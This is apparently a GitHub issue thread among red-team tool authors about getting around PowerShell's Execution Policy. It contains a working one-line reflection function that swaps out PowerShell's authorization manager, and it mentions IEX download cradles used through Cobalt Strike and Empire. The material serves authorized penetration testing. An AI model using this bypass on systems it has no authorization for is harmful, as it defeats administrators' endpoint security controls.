Powershell signing

[h-a-t-zz]

Hi Guys,

Thanks for your awesome work on Red Teaming with Powershell. If I may suggest a onliner for desactivating the powershell Execution policy "issue", when the "powershell.exe -exec bypass" doesn't work.

function Disable-ExecutionPolicy {
($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}

src: http://www.nivot.org/blog/post/2012/02/10/Bypassing-Restricted-Execution-Policy-in-Code-or-in-Script

I've just tested it in an assignement, and it seems to work out very well. Hope that will help. Cheers !

[HarmJ0y]

Hey, thanks for reaching out with the cool trick!

I'm trying to get my head around how exactly to use this operationally- it doesn't seem like it makes sense to integrate into any of the scripts themselves, as we'll hit the catch-22 of the code not being able to run to determine if needs to disable the policy. In the PowerShell integration in Cobalt Strike and our weaponization with Empire we use the IEX download cradle and stay off of disk, so execution policy never even enters into our thinking as a script is not loaded off of disk. All that said, not trying to be dismissive, just get an idea of how you would envision this trick being used in these projects.

[h-a-t-zz]

Hey, sorry for the late response. This specific assignement had endpoints with SEP installed on, along with a tightly managed GPOs, and a proxified connectivity : IEX was out of use as Github and pastbin being filtred, even a SimpleHTTPServer within the internal network hosting the scripts is unreachable. The only "external access" was USB. This post wasn't intented to propose a pull request, but only a suggestion when execution off disk is not possible, with a cool unprivileged powershell trick :) Hope this helps anyhow o/

[stufus]

@hi-t-ch I had the same thing on a recent engagement and that trick did indeed work to get round the Import-Module issue. That said, an IEX cradle worked without a problem so it never "became" a problem, but I can vouch for the above :)

[h-a-t-zz]

Ouh ! Forgot to close this "issue". My bad. Thanks for the confirmation @stufus o/